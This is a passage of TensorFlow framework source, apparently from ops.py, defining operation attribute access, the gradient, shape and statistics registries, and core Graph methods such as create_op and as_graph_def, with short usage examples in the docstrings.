c_api.SetAttr(self._graph._c_graph, self._c_op, attr_name, buf)
# pylint: enable=protected-access
finally:
c_api.TF_DeleteBuffer(buf)
def get_attr(self, name):
"""Returns the value of the attr of this op with the given `name`.
Args:
name: The name of the attr to fetch.
Returns:
The value of the attr, as a Python object.
Raises:
ValueError: If this op does not have an attr with the given `name`.
"""
fields = ["s", "i", "f", "b", "type", "shape", "tensor", "func"]
try:
with c_api_util.tf_buffer() as buf:
c_api.TF_OperationGetAttrValueProto(self._c_op, name, buf)
data = c_api.TF_GetBuffer(buf)
except errors.InvalidArgumentError as e:
# Convert to ValueError for backwards compatibility.
raise ValueError(str(e))
x = attr_value_pb2.AttrValue()
x.ParseFromString(data)
# Treat an empty oneof value as an empty list.
if not x.WhichOneof("value"):
return []
if x.HasField("list"):
for f in fields:
if getattr(x.list, f):
if f == "type":
return [dtypes.as_dtype(x) for x in list(getattr(x.list, f))]
else:
return list(getattr(x.list, f))
return []
else:
for f in fields:
if x.HasField(f):
if f == "type":
return dtypes.as_dtype(getattr(x, f))
else:
return getattr(x, f)
assert False, "Unsupported field type in " + str(x)
def run(self, feed_dict=None, session=None):
"""Runs this operation in a `Session`.
Calling this method will execute all preceding operations that
produce the inputs needed for this operation.
*N.B.* Before invoking `Operation.run()`, its graph must have been
launched in a session, and either a default session must be
available, or `session` must be specified explicitly.
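For example, a tiny sketch (assumes graph mode and a `tf.Session`):
```python
v = tf.Variable(1.0)
init = tf.global_variables_initializer()
with tf.Session() as sess:
  init.run()           # shorthand for sess.run(init)
  print(sess.run(v))   # 1.0
```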
Args:
feed_dict: A dictionary that maps `Tensor` objects to feed values.
See @{tf.Session.run}
for a description of the valid feed values.
session: (Optional.) The `Session` to be used to run to this operation. If
none, the default session will be used.
"""
_run_using_default_session(self, feed_dict, self.graph, session)
_gradient_registry = registry.Registry("gradient")
@tf_export("RegisterGradient")
class RegisterGradient(object):
"""A decorator for registering the gradient function for an op type.
This decorator is only used when defining a new op type. For an op
with `m` inputs and `n` outputs, the gradient function is a function
that takes the original `Operation` and `n` `Tensor` objects
(representing the gradients with respect to each output of the op),
and returns `m` `Tensor` objects (representing the partial gradients
with respect to each input of the op).
For example, assuming that operations of type `"Sub"` take two
inputs `x` and `y`, and return a single output `x - y`, the
following gradient function would be registered:
```python
@tf.RegisterGradient("Sub")
def _sub_grad(unused_op, grad):
return grad, tf.negative(grad)
```
The decorator argument `op_type` is the string type of an
operation. This corresponds to the `OpDef.name` field for the proto
that defines the operation.
"""
def __init__(self, op_type):
"""Creates a new decorator with `op_type` as the Operation type.
Args:
op_type: The string type of an operation. This corresponds to the
`OpDef.name` field for the proto that defines the operation.
"""
if not isinstance(op_type, six.string_types):
raise TypeError("op_type must be a string")
self._op_type = op_type
def __call__(self, f):
"""Registers the function `f` as gradient function for `op_type`."""
_gradient_registry.register(f, self._op_type)
return f
@tf_export("NoGradient", "NotDifferentiable")
def NotDifferentiable(op_type):
"""Specifies that ops of type `op_type` is not differentiable.
This function should *not* be used for operations that have a
well-defined gradient that is not yet implemented.
This function is only used when defining a new op type. It may be
used for ops such as `tf.size()` that are not differentiable. For
example:
```python
tf.NotDifferentiable("Size")
```
The gradient computed for 'op_type' will then propagate zeros.
For ops that have a well-defined gradient but are not yet implemented,
no declaration should be made, and an error *must* be thrown if
an attempt to request its gradient is made.
Args:
op_type: The string type of an operation. This corresponds to the
`OpDef.name` field for the proto that defines the operation.
Raises:
TypeError: If `op_type` is not a string.
"""
if not isinstance(op_type, six.string_types):
raise TypeError("op_type must be a string")
_gradient_registry.register(None, op_type)
# Alias for the old name, will be eventually removed.
NoGradient = NotDifferentiable
def get_gradient_function(op):
"""Returns the function that computes gradients for "op"."""
if not op.inputs:
return None
try:
op_type = op.get_attr("_gradient_op_type")
except ValueError:
op_type = op.type
return _gradient_registry.lookup(op_type)
_shape_registry = registry.Registry("shape functions")
_default_shape_function_registry = registry.Registry("default shape functions")
# These are set to common_shapes.call_cpp_shape_fn by op generated code
# (generated by python_op_gen.cc).
# It is set outside ops.py to avoid a circular dependency.
_call_cpp_shape_fn = None
_call_cpp_shape_fn_and_require_op = None
def _set_call_cpp_shape_fn(call_cpp_shape_fn):
"""Sets default shape fns from passed common_shapes.call_cpp_shape_fn."""
global _call_cpp_shape_fn, _call_cpp_shape_fn_and_require_op
if _call_cpp_shape_fn:
return # already registered
def call_without_requiring(op):
return call_cpp_shape_fn(op, require_shape_fn=False)
_call_cpp_shape_fn = call_without_requiring
def call_with_requiring(op):
return call_cpp_shape_fn(op, require_shape_fn=True)
_call_cpp_shape_fn_and_require_op = call_with_requiring
class RegisterShape(object):
"""No longer used. Was: A decorator for registering a shape function.
Shape functions must now be registered via the SetShapeFn on the
original Op specification in C++.
"""
def __init__(self, op_type):
"""Saves the `op_type` as the `Operation` type."""
if not isinstance(op_type, six.string_types):
raise TypeError("op_type must be a string")
self._op_type = op_type
def __call__(self, f):
"""Registers "f" as the shape function for "op_type"."""
if f is None:
assert _call_cpp_shape_fn
# None is a special "weak" value that provides a default shape function,
# and can be overridden by a non-None registration.
try:
_default_shape_function_registry.register(_call_cpp_shape_fn,
self._op_type)
except KeyError:
# Ignore duplicate registrations of the weak value. This can
# occur if the op library input to wrapper generation
# inadvertently links in one or more of the standard op
# libraries.
pass
else:
_shape_registry.register(f, self._op_type)
return f
# TODO(b/74620627): remove when _USE_C_SHAPES is removed
def _set_shape_and_handle_data_for_outputs_c_api(op):
"""Set shapes and resource handle data using info from the C API."""
assert not _USE_C_SHAPES
for output in op.outputs:
output._shape_val = output._c_api_shape()
# Set the resource handle data for compatibility with the Python shape
# inference code.
serialized = c_api.GetResourceHandleShapeAndType(op._graph._c_graph,
output._as_tf_output())
if serialized:
output._handle_data = (
cpp_shape_inference_pb2.CppShapeInferenceResult.HandleData
.FromString(compat.as_bytes(serialized)))
else:
output._handle_data = None
# TODO(b/74620627): remove when _USE_C_SHAPES is removed
def set_shape_and_handle_data_for_outputs(op):
"""Set the shapes and resource handle data for op's outputs.
When _USE_C_SHAPES = False, this is lazily called when a tensor's shape is
first requested. Usually this should work automatically, but some edge cases
may require manually calling this first to make sure Tensor._shape_val and
Tensor._handle_data are set (e.g. manually overriding _handle_data, copying a
Tensor).
"""
if _USE_C_SHAPES: return
if op.graph._is_function(op.type):
for output in op.outputs:
output._shape_val = tensor_shape.unknown_shape()
return
try:
shape_func = _shape_registry.lookup(op.type)
except LookupError:
try:
shape_func = _default_shape_function_registry.lookup(op.type)
except LookupError:
shape_func = _call_cpp_shape_fn_and_require_op
shapes = shape_func(op)
if shapes is None:
raise RuntimeError(
"Shape function for op %s did not return any shapes" % op)
elif isinstance(shapes, dict):
# Returned by call_cpp_shape_fn
shapes_dict = shapes
shapes = shapes_dict["shapes"]
handle_datas = shapes_dict["handle_data"]
for output, handle_data in zip(op.outputs, handle_datas):
# Don't override any existing handle data that may have been manually set.
# pylint: disable=protected-access
if output._handle_data is None:
output._handle_data = handle_data
# pylint: enable=protected-access
if len(op.outputs) != len(shapes):
raise RuntimeError(
"Shape function for op %s returned %d shapes but expected %d %s %s" %
(op, len(shapes), len(op.outputs), shape_func.__name__, str(shapes)))
for output, s in zip(op.outputs, shapes):
output._shape_val = tensor_shape.unknown_shape()
output._shape_val = output._shape_val.merge_with(s)
class OpStats(object):
"""A holder for statistics about an operator.
This class holds information about the resource requirements for an op,
including the size of its weight parameters on-disk and how many FLOPS it
requires to execute forward inference.
If you define a new operation, you can create a function that will return a
set of information about its usage of the CPU and disk space when serialized.
The function itself takes a Graph object (set up so you can call methods like
get_tensor_by_name to help calculate the results) and a NodeDef argument.
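For example, a minimal sketch of combining statistics (with this module
imported as `ops`; the values are made up):
```python
stats = ops.OpStats("flops", 1024)
stats += ops.OpStats("flops", 2048)   # values of the same type accumulate
assert stats.value == 3072
```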
"""
def __init__(self, statistic_type, value=None):
"""Sets up the initial placeholders for the statistics."""
self.statistic_type = statistic_type
self.value = value
@property
def statistic_type(self):
return self._statistic_type
@statistic_type.setter
def statistic_type(self, statistic_type):
self._statistic_type = statistic_type
@property
def value(self):
return self._value
@value.setter
def value(self, value):
self._value = value
def __iadd__(self, other):
if other.statistic_type != self.statistic_type:
raise ValueError("Can't add an OpStat of type %s to one of %s." %
(self.statistic_type, other.statistic_type))
if self.value is None:
self.value = other.value
elif other.value is not None:
self._value += other.value
return self
_stats_registry = registry.Registry("statistical functions")
class RegisterStatistics(object):
"""A decorator for registering the statistics function for an op type.
This decorator can be defined for an op type so that it gives a
report on the resources used by an instance of an operator, in the
form of an OpStats object.
Well-known types of statistics include these so far:
- flops: When running a graph, the bulk of the computation happens doing
numerical calculations like matrix multiplications. This type allows a node
to return how many floating-point operations it takes to complete. The
total number of FLOPs for a graph is a good guide to its expected latency.
You can add your own statistics just by picking a new type string, registering
functions for the ops you care about, and then calling get_stats_for_node_def.
If a statistic for an op is registered multiple times, a KeyError will be
raised.
Since statistics are counted on a per-op basis, they are not suitable for
model parameters (capacity), which are expected to be counted only once,
even if shared by multiple ops (e.g. RNN).
For example, you can define a new metric called doohickey for a Foo operation
by placing this in your code:
```python
@ops.RegisterStatistics("Foo", "doohickey")
def _calc_foo_bojangles(unused_graph, unused_node_def):
return ops.OpStats("doohickey", 20)
```
Then in client code you can retrieve the value by making this call:
```python
doohickey = ops.get_stats_for_node_def(graph, node_def, "doohickey")
```
If the NodeDef is for an op with a registered doohickey function, you'll get
back the calculated amount in doohickey.value, or None if it's not defined.
"""
def __init__(self, op_type, statistic_type):
"""Saves the `op_type` as the `Operation` type."""
if not isinstance(op_type, six.string_types):
raise TypeError("op_type must be a string.")
if "," in op_type:
raise TypeError("op_type must not contain a comma.")
self._op_type = op_type
if not isinstance(statistic_type, six.string_types):
raise TypeError("statistic_type must be a string.")
if "," in statistic_type:
raise TypeError("statistic_type must not contain a comma.")
self._statistic_type = statistic_type
def __call__(self, f):
"""Registers "f" as the statistics function for "op_type"."""
_stats_registry.register(f, self._op_type + "," + self._statistic_type)
return f
def get_stats_for_node_def(graph, node, statistic_type):
"""Looks up the node's statistics function in the registry and calls it.
This function takes a Graph object and a NodeDef from a GraphDef, and if
there's an associated statistics method, calls it and returns a result. If no
function has been registered for the particular node type, it returns an empty
statistics object.
Args:
graph: A Graph object that's been set up with the node's graph.
node: A NodeDef describing the operator.
statistic_type: A string identifying the statistic we're interested in.
Returns:
An OpStats object containing information about resource usage.
"""
try:
stats_func = _stats_registry.lookup(node.op + "," + statistic_type)
result = stats_func(graph, node)
except LookupError:
result = OpStats(statistic_type)
return result
def _name_from_scope_name(name):
"""Returns the name of an op given the name of its scope.
Args:
name: the name of the scope.
Returns:
the name of the op (equal to scope name minus any trailing slash).
"""
return name[:-1] if (name and name[-1] == "/") else name
@tf_export("Graph")
class Graph(object):
"""A TensorFlow computation, represented as a dataflow graph.
A `Graph` contains a set of
@{tf.Operation} objects,
which represent units of computation; and
@{tf.Tensor} objects, which represent
the units of data that flow between operations.
A default `Graph` is always registered, and accessible by calling
@{tf.get_default_graph}.
To add an operation to the default graph, simply call one of the functions
that defines a new `Operation`:
```python
c = tf.constant(4.0)
assert c.graph is tf.get_default_graph()
```
Another typical usage involves the
@{tf.Graph.as_default}
context manager, which overrides the current default graph for the
lifetime of the context:
```python
g = tf.Graph()
with g.as_default():
# Define operations and tensors in `g`.
c = tf.constant(30.0)
assert c.graph is g
```
Important note: This class *is not* thread-safe for graph construction. All
operations should be created from a single thread, or external
synchronization must be provided. Unless otherwise specified, all methods
are not thread-safe.
A `Graph` instance supports an arbitrary number of "collections"
that are identified by name. For convenience when building a large
graph, collections can store groups of related objects: for
example, the `tf.Variable` uses a collection (named
@{tf.GraphKeys.GLOBAL_VARIABLES}) for
all variables that are created during the construction of a graph. The caller
may define additional collections by specifying a new name.
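For example, a small sketch using the collection methods (the collection
name is arbitrary):
```python
g = tf.Graph()
with g.as_default():
  c = tf.constant(42.0)
  g.add_to_collection("my_constants", c)
assert g.get_collection("my_constants")[0] is c
```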
"""
def __init__(self):
"""Creates a new, empty Graph."""
# Protects core state that can be returned via public accessors, as well as
# synchronizes Session.run calls with methods that create and mutate ops
# (e.g. Graph.create_op()). This synchronization is necessary because it's
# illegal to modify an operation after it's been run. Thread-safety is
# provided on a best-effort basis to support buggy programs, and is not
# guaranteed by the public `tf.Graph` API.
#
# The lock must be reentrant because create_op can be called recursively due
# to control flow. Without a reentrant lock, many methods would also need a
# "locked" version or parameter (including generated code).
#
# NOTE(mrry): This does not protect the various stacks. A warning will
# be reported if these are used from multiple threads.
self._lock = threading.RLock()
self._nodes_by_id = dict() # GUARDED_BY(self._lock)
self._next_id_counter = 0 # GUARDED_BY(self._lock)
self._nodes_by_name = dict() # GUARDED_BY(self._lock)
self._version = 0 # GUARDED_BY(self._lock)
# Maps a name used in the graph to the next id to use for that name.
self._names_in_use = {}
self._stack_state_is_thread_local = False
self._thread_local = threading.local()
# Functions that will be applied to choose a device if none is specified.
# After switch_to_thread_local(), self._thread_local._device_function_stack
# is used instead.
self._graph_device_function_stack = []
# Default original_op applied to new ops.
self._default_original_op = None
# Current control flow context. It could be either CondContext or
# WhileContext defined in ops/control_flow_ops.py
self._control_flow_context = None
# A new node will depend on the union of all of the nodes in the stack.
# After switch_to_thread_local(),
# self._thread_local._control_dependencies_stack is used instead.
self._graph_control_dependencies_stack = []
# Arbitrary collections of objects.
self._collections = {}
# The graph-level random seed
self._seed = None
# A dictionary of attributes that should be applied to all ops.
self._attr_scope_map = {}
# A map from op type to the kernel label that should be used.
self._op_to_kernel_label_map = {}
# A map from op type to an alternative op type that should be used when
# computing gradients.
self._gradient_override_map = {}
# True if the graph is considered "finalized". In that case no
# new operations can be added.
self._finalized = False
# Functions defined in the graph
self._functions = collections.OrderedDict()
# Default GraphDef versions
self._graph_def_versions = versions_pb2.VersionDef(
producer=versions.GRAPH_DEF_VERSION,
min_consumer=versions.GRAPH_DEF_VERSION_MIN_CONSUMER)
self._building_function = False
# Stack of colocate_with ops. After switch_to_thread_local(),
# self._thread_local._colocation_stack is used instead.
self._graph_colocation_stack = []
# Set of tensors that are dangerous to feed!
self._unfeedable_tensors = set()
# Set of operations that are dangerous to fetch!
self._unfetchable_ops = set()
# A map of tensor handle placeholder to tensor dtype.
self._handle_feeders = {}
# A map from tensor handle to its read op.
self._handle_readers = {}
# A map from tensor handle to its move op.
self._handle_movers = {}
# A map from tensor handle to its delete op.
self._handle_deleters = {}
# Allow optimizers and other objects to pseudo-uniquely key graphs (this key
# will be shared when defining function graphs, for example, so optimizers
# being called inside function definitions behave as if they were seeing the
# actual outside graph).
self._graph_key = "grap-key-%d/" % (uid(),)
# A string with the last reduction method passed to
# losses.compute_weighted_loss(), or None.
self._last_loss_reduction = None
self._container = ""
self._registered_ops = op_def_registry.get_registered_ops()
# TODO(skyewm): fold as much of the above as possible into the C
# implementation
if self._use_c_api_hack():
self._scoped_c_graph = c_api_util.ScopedTFGraph()
# The C API requires all ops to have shape functions. Disable this
# requirement (many custom ops do not have shape functions, and we don't
# want to break these existing cases).
c_api.SetRequireShapeInferenceFns(self._c_graph, False)
else:
self._scoped_c_graph = None
# TODO(apassos) remove once the C API is used by default.
def _use_c_api_hack(self):
"""Temporary hack; can be overridden to force C API usage."""
return _USE_C_API
def _convert_stack(self, stack, include_func_start_lineno=False):
"""Converts a stack extracted using _extract_stack() to a traceback stack.
Args:
stack: A list of n 6-tuples,
(filename, lineno, name, frame_globals, func_start_lineno, custom_info),
as returned by `_extract_stack()`.
include_func_start_lineno: True if function start line number should be
included as the 5th entry in return tuples.
Returns:
A list of n 4-tuples or 5-tuples
(filename, lineno, name, code, [optional: func_start_lineno]), where the
code tuple element is calculated from the corresponding elements of the
input tuple.
"""
ret = []
for (filename, lineno, name, frame_globals, func_start_lineno,
unused_frame_info) in stack:
linecache.checkcache(filename)
line = linecache.getline(filename, lineno, frame_globals)
if line:
line = line.strip()
else:
line = None
if include_func_start_lineno:
ret.append((filename, lineno, name, line, func_start_lineno))
else:
ret.append((filename, lineno, name, line))
return ret
# Note: this method is private because the API of tf.Graph() is public and
# frozen, and this functionality is still not ready for public visibility.
@tf_contextlib.contextmanager
def _variable_creator_scope(self, creator):
# This step makes a copy of the existing stack, and it also initializes
# self._thread_local._variable_creator_stack if it doesn't exist yet.
old = list(self._variable_creator_stack)
self._thread_local._variable_creator_stack.append(creator)
try:
yield
finally:
self._thread_local._variable_creator_stack = old
# Note: this method is private because the API of tf.Graph() is public and
# frozen, and this functionality is still not ready for public visibility.
@property
def _variable_creator_stack(self):
if not hasattr(self._thread_local, "_variable_creator_stack"):
self._thread_local._variable_creator_stack = []
return list(self._thread_local._variable_creator_stack)
@_variable_creator_stack.setter
def _variable_creator_stack(self, variable_creator_stack):
self._thread_local._variable_creator_stack = variable_creator_stack
def _extract_stack(self):
"""A lightweight, extensible re-implementation of traceback.extract_stack.
NOTE(mrry): traceback.extract_stack eagerly retrieves the line of code for
each stack frame using linecache, which results in an abundance of stat()
calls. This implementation does not retrieve the code, and any consumer
should apply _convert_stack to the result to obtain a traceback that can
be formatted etc. using traceback methods.
Derived classes can implement _extract_frame_info() to add extra information
to the traceback.
Returns:
A list of 6-tuples
(filename, lineno, name, frame_globals, func_start_lineno, custom_info)
corresponding to the call stack of the current thread.
"""
try:
raise ZeroDivisionError
except ZeroDivisionError:
f = sys.exc_info()[2].tb_frame.f_back
ret = []
while f is not None:
lineno = f.f_lineno
co = f.f_code
filename = co.co_filename
name = co.co_name
frame_globals = f.f_globals
func_start_lineno = co.co_firstlineno
frame_info = self._extract_frame_info(f)
ret.append((filename, lineno, name, frame_globals, func_start_lineno,
frame_info))
f = f.f_back
ret.reverse()
return ret
def _extract_frame_info(self, frame): # pylint: disable=unused-argument
"""Extracts custom information from a frame in an op traceback."""
return None
def _check_not_finalized(self):
"""Check if the graph is finalized.
Raises:
RuntimeError: If the graph is finalized.
"""
if self._finalized:
raise RuntimeError("Graph is finalized and cannot be modified.")
def _add_op(self, op):
"""Adds 'op' to the graph.
Args:
op: the Operation or Tensor to add.
Raises:
TypeError: if op is not an Operation or Tensor.
ValueError: if the op.name or op._id are already used.
"""
self._check_not_finalized()
if not isinstance(op, (Tensor, Operation)):
raise TypeError("op must be a Tensor or Operation: %s" % op)
with self._lock:
# pylint: disable=protected-access
if op._id in self._nodes_by_id:
raise ValueError("cannot add an op with id %d as it already "
"exists in the graph" % op._id)
if op.name in self._nodes_by_name:
raise ValueError("cannot add op with name %s as that name "
"is already used" % op.name)
self._nodes_by_id[op._id] = op
self._nodes_by_name[op.name] = op
self._version = max(self._version, op._id)
# pylint: enable=protected-access
@property
def _c_graph(self):
if self._scoped_c_graph:
return self._scoped_c_graph.graph
return None
@property
def version(self):
"""Returns a version number that increases as ops are added to the graph.
Note that this is unrelated to the
@{tf.Graph.graph_def_versions}.
Returns:
An integer version that increases as ops are added to the graph.
"""
if self._finalized:
return self._version
with self._lock:
return self._version
@property
def graph_def_versions(self):
# pylint: disable=line-too-long
"""The GraphDef version information of this graph.
For details on the meaning of each version, see
[`GraphDef`](https://www.tensorflow.org/code/tensorflow/core/framework/graph.proto).
Returns:
A `VersionDef`.
"""
# pylint: enable=line-too-long
with c_api_util.tf_buffer() as buf:
c_api.TF_GraphVersions(self._c_graph, buf)
data = c_api.TF_GetBuffer(buf)
version_def = versions_pb2.VersionDef()
version_def.ParseFromString(compat.as_bytes(data))
return version_def
@property
def seed(self):
"""The graph-level random seed of this graph."""
return self._seed
@seed.setter
def seed(self, seed):
self._seed = seed
@property
def finalized(self):
"""True if this graph has been finalized."""
return self._finalized
def finalize(self):
"""Finalizes this graph, making it read-only.
After calling `g.finalize()`, no new operations can be added to
`g`. This method is used to ensure that no operations are added
to a graph when it is shared between multiple threads, for example
when using a @{tf.train.QueueRunner}.
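For example (a minimal sketch of the intended usage):
```python
g = tf.Graph()
with g.as_default():
  c = tf.constant(1.0)
g.finalize()
assert g.finalized
# Any further attempt to add an op to `g` now raises
# "RuntimeError: Graph is finalized and cannot be modified."
```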
"""
self._finalized = True
def _unsafe_unfinalize(self):
"""Opposite of `finalize`. Internal interface.
NOTE: Unfinalizing a graph could have negative impact on performance,
especially in a multi-threaded environment. Unfinalizing a graph
when it is in use by a Session may lead to undefined behavior. Ensure
that all sessions using a graph are closed before calling this method.
"""
self._finalized = False
def _get_control_flow_context(self):
"""Returns the current control flow context.
Returns:
A context object.
"""
return self._control_flow_context
def _set_control_flow_context(self, ctx):
"""Sets the current control flow context.
Args:
ctx: a context object.
"""
self._control_flow_context = ctx
def _copy_functions_to_graph_def(self, graph_def, starting_bytesize):
"""If this graph contains functions, copy them to `graph_def`."""
bytesize = starting_bytesize
for f in self._functions.values():
bytesize += f.definition.ByteSize()
if bytesize >= (1 << 31) or bytesize < 0:
raise ValueError("GraphDef cannot be larger than 2GB.")
graph_def.library.function.extend([f.definition])
if f.grad_func_name:
grad_def = function_pb2.GradientDef()
grad_def.function_name = f.name
grad_def.gradient_func = f.grad_func_name
graph_def.library.gradient.extend([grad_def])
def _as_graph_def(self, from_version=None, add_shapes=False):
# pylint: disable=line-too-long
"""Returns a serialized `GraphDef` representation of this graph.
The serialized `GraphDef` can be imported into another `Graph`
(using @{tf.import_graph_def}) or used with the
[C++ Session API](../../../../api_docs/cc/index.md).
This method is thread-safe.
Args:
from_version: Optional. If this is set, returns a `GraphDef`
containing only the nodes that were added to this graph since
its `version` property had the given value.
add_shapes: If true, adds an "_output_shapes" list attr to each
node with the inferred shapes of each of its outputs.
Returns:
A tuple containing a
[`GraphDef`](https://www.tensorflow.org/code/tensorflow/core/framework/graph.proto)
protocol buffer, and the version of the graph to which that
`GraphDef` corresponds.
Raises:
ValueError: If the `graph_def` would be too large.
"""
# pylint: enable=line-too-long
with self._lock:
with c_api_util.tf_buffer() as buf:
c_api.TF_GraphToGraphDef(self._c_graph, buf)
data = c_api.TF_GetBuffer(buf)
graph = graph_pb2.GraphDef()
graph.ParseFromString(compat.as_bytes(data))
# Strip the experimental library field iff it's empty.
if not graph.library.function:
graph.ClearField("library")
if add_shapes:
for node in graph.node:
op = self._nodes_by_name[node.name]
if op.outputs:
node.attr["_output_shapes"].list.shape.extend(
[output.get_shape().as_proto() for output in op.outputs])
return graph, self._version
def as_graph_def(self, from_version=None, add_shapes=False):
# pylint: disable=line-too-long
"""Returns a serialized `GraphDef` representation of this graph.
The serialized `GraphDef` can be imported into another `Graph`
(using @{tf.import_graph_def}) or used with the
[C++ Session API](../../api_docs/cc/index.md).
This method is thread-safe.
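For example (a minimal sketch; the node inspection is illustrative only):
```python
g = tf.Graph()
with g.as_default():
  tf.constant([1.0, 2.0], name="c")
graph_def = g.as_graph_def(add_shapes=True)
assert graph_def.node[0].name == "c"
```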
Args:
from_version: Optional. If this is set, returns a `GraphDef`
containing only the nodes that were added to this graph since
its `version` property had the given value.
add_shapes: If true, adds an "_output_shapes" list attr to each
node with the inferred shapes of each of its outputs.
Returns:
A
[`GraphDef`](https://www.tensorflow.org/code/tensorflow/core/framework/graph.proto)
protocol buffer.
Raises:
ValueError: If the `graph_def` would be too large.
"""
# pylint: enable=line-too-long
result, _ = self._as_graph_def(from_version, add_shapes)
return result
def _is_function(self, name):
"""Tests whether 'name' is registered in this graph's function library.
Args:
name: string op name.
Returns:
bool indicating whether or not 'name' is registered in function library.
"""
return name in self._functions
def _get_function(self, name):
"""Returns the function definition for 'name'.
Args:
name: string function name.
Returns:
The `_DefinedFunction` object registered for `name`, or None if no such
function is registered.
"""
return self._functions.get(name, None)
def _add_function(self, function):
"""Adds a function to the graph.
After the function has been added, you can call the function by
passing the function name in place of an op name to
`Graph.create_op()`.
Args:
function: A `_DefinedFunction` object.
Raises:
ValueError: if another function is defined with the same name.
"""
name = function.name
# Sanity checks on gradient definition.
if (function.grad_func_name is not None) and (function.python_grad_func is
not None):
raise ValueError("Gradient defined twice for function %s" % name)
# Add function to graph
# pylint: disable=protected-access
# Handle functions created without using the C API. TODO(apassos,skyewm)
# remove this when all functions are generated using the C API by default
# as this will be unnecessary.
if not function._c_func:
serialized = function.definition.SerializeToString()
c_func = c_api.TF_FunctionImportFunctionDef(serialized)
function._c_func = c_api_util.ScopedTFFunction(c_func)
gradient = (function._grad_func._c_func.func if function._grad_func
else None)
c_api.TF_GraphCopyFunction(self._c_graph, function._c_func.func, gradient)
# pylint: enable=protected-access
self._functions[name] = function
# Need a new-enough consumer to support the functions we add to the graph.
if self._graph_def_versions.min_consumer < 12:
self._graph_def_versions.min_consumer = 12
@property
def building_function(self):
"""Returns True iff this graph represents a function."""
return self._building_function
# Helper functions to create operations.
@deprecated_args(None,
"Shapes are always computed; don't use the compute_shapes "
"as it has no effect.", "compute_shapes")
def create_op(
self,
op_type,
inputs,
dtypes, # pylint: disable=redefined-outer-name
input_types=None,
name=None,
attrs=None,
op_def=None,
compute_shapes=True,
compute_device=True):
"""Creates an `Operation` in this graph.
This is a low-level interface for creating an `Operation`. Most
programs will not call this method directly, and instead use the
Python op constructors, such as `tf.constant()`, which add ops to
the default graph.
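For example (a minimal sketch; "my_identity" is an arbitrary illustrative
name, and the standard "Identity" op is used only because it takes a single
input):
```python
g = tf.Graph()
with g.as_default():
  c = tf.constant(1.0)
  identity_op = g.create_op("Identity", [c], [tf.float32],
                            name="my_identity")
assert identity_op.outputs[0].dtype == tf.float32
```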
Args:
op_type: The `Operation` type to create. This corresponds to the
`OpDef.name` field for the proto that defines the operation.
inputs: A list of `Tensor` objects that will be inputs to the `Operation`.
dtypes: A list of `DType` objects that will be the types of the tensors
that the operation produces.
input_types: (Optional.) A list of `DType`s that will be the types of
the tensors that the operation consumes. By default, uses the base
`DType` of each input in `inputs`. Operations that expect
reference-typed inputs must specify `input_types` explicitly.
name: (Optional.) A string name for the operation. If not specified, a
name is generated based on `op_type`.
attrs: (Optional.) A dictionary where the key is the attribute name (a
string) and the value is the respective `attr` attribute of the
`NodeDef` proto that will represent the operation (an `AttrValue`
proto).
op_def: (Optional.) The `OpDef` proto that describes the `op_type` that
the operation will have.
compute_shapes: (Optional.) Deprecated. Has no effect (shapes are always
computed).
compute_device: (Optional.) If True, device functions will be executed
to compute the device property of the Operation.
Raises:
TypeError: if any of the inputs is not a `Tensor`.
ValueError: if colocation conflicts with existing device assignment.
Returns:
An `Operation` object.
"""
del compute_shapes
self._check_not_finalized()
for idx, a in enumerate(inputs):
if not isinstance(a, Tensor):
raise TypeError("Input #%d is not a tensor: %s" % (idx, a))
if name is None:
name = op_type
# If a name ends with a '/' it is a "name scope" and we use it as-is,
# after removing the trailing '/'.
if name and name[-1] == "/":
name = _name_from_scope_name(name)
else:
name = self.unique_name(name)
node_def = _NodeDef(op_type, name, device=None, attrs=attrs)
input_ops = set([t.op for t in inputs])
control_inputs = self._control_dependencies_for_inputs(input_ops)
# _create_op_helper mutates the new Operation. _lock ensures a Session.run
# call cannot occur between creating and mutating the op.
with self._lock:
ret = Operation(
node_def,
self,
inputs=inputs,
output_types=dtypes,
control_inputs=control_inputs,
input_types=input_types,
original_op=self._default_original_op,
op_def=op_def)
self._create_op_helper(ret, compute_device=compute_device)
return ret
def _create_op_from_tf_operation(self, c_op, compute_device=True):
"""Creates an `Operation` in this graph from the supplied TF_Operation.
This method is like create_op() except the new Operation is constructed
using `c_op`. The returned Operation will have `c_op` as its _c_op
field. This is used to create Operation objects around TF_Operations created
indirectly by the C API (e.g. by TF_ImportGraphDef, TF_FinishWhile).
This function does not call Operation._control_flow_post_processing or
Graph._control_dependencies_for_inputs (since the inputs may not be
available yet). The caller is responsible for calling these methods.
Args:
c_op: a wrapped TF_Operation
compute_device: (Optional.) If True, device functions will be executed
to compute the device property of the Operation.
Returns:
An `Operation` object.
"""
self._check_not_finalized()
ret = Operation(c_op, self)
# If a name_scope was created with ret.name but no nodes were created in it,
# the name will still appear in _names_in_use even though the name hasn't
# been used. This is ok, just leave _names_in_use as-is in this case.
# TODO(skyewm): make the C API guarantee no name conflicts.
name_key = ret.name.lower()
if name_key not in self._names_in_use:
self._names_in_use[name_key] = 1
self._create_op_helper(ret, compute_device=compute_device)
return ret
def _create_op_helper(self, op, compute_device=True):
"""Common logic for creating an op in this graph."""
# Apply any additional attributes requested. Do not overwrite any existing
# attributes.
for key, value in self._attr_scope_map.items():
try:
op.get_attr(key)
except ValueError:
if callable(value):
value = value(op.node_def)
if not isinstance(value, (type(None), attr_value_pb2.AttrValue)):
raise TypeError(
"Callable for scope map key '%s' must return either None or "
"an AttrValue protocol buffer; but it returned: %s" % (key,
value))
if value:
op._set_attr(key, value) # pylint: disable=protected-access
# Apply a kernel label if one has been specified for this op type.
try:
kernel_label = self._op_to_kernel_label_map[op.type]
op._set_attr("_kernel", # pylint: disable=protected-access
attr_value_pb2.AttrValue(s=compat.as_bytes(kernel_label)))
except KeyError:
pass
# Apply the overriding op type for gradients if one has been specified for
# this op type.
try:
mapped_op_type = self._gradient_override_map[op.type]
op._set_attr("_gradient_op_type", # pylint: disable=protected-access
attr_value_pb2.AttrValue(s=compat.as_bytes(mapped_op_type)))
except KeyError:
pass
self._record_op_seen_by_control_dependencies(op)
if compute_device:
self._apply_device_functions(op)
if self._colocation_stack:
all_colocation_groups = []
for colocation_op in self._colocation_stack:
all_colocation_groups.extend(colocation_op.colocation_groups())
if colocation_op.device:
# Make this device match the device of the colocated op, to provide
# consistency between the device and the colocation property.
if (op.device and pydev.canonical_name(op.device) !=
pydev.canonical_name(colocation_op.device)):
logging.warning("Tried to colocate %s with an op %s that had "
"a different device: %s vs %s. Postponing "
"error-checking until all devices are assigned.",
op.name, colocation_op.name, op.device,
colocation_op.device)
else:
op._set_device(colocation_op.device) # pylint: disable=protected-access
all_colocation_groups = sorted(set(all_colocation_groups))
